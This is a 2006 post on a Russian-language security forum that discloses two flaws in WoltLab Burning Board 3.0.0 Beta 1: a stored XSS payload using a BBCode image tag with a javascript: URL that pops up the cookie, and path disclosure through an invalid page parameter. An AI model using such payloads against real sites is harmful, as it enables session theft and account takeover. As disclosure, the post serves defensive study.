ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Burning Board 3.0.0 Beta 1
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Burning Board 3.0.0 Beta 1
  #1  
Старый 14.12.2006, 22:31
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию Burning Board 3.0.0 Beta 1
Вот что я надыбал в Burning Board 3.0.0 Beta 1

1. Активная XSS прямо в сообщении

Код:
[img]javascript:alert(document.cookie)[/img]
заменяеться на
Код:
<img src="java&*#115;cript:alert(document.cookie)" class="resizeImage" alt="" />
и куки у нас в алерте

2. Раскрытие пути


При подстановке неверного значения в переменную $_GET["page"] выдаеться сообщение об ошибке
Код:
index.php?page=Bugaga
Можно узнать полный путь к форуму
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
WoltLab Burning Board 2.2 - что за крепость, и есть ли уязвимости? Anti Форумы 8 13.06.2006 16:09
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Форумы 14 19.04.2006 19:40
Дырки в Burning Board 2.3.3 Nova Форумы 8 02.01.2006 21:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ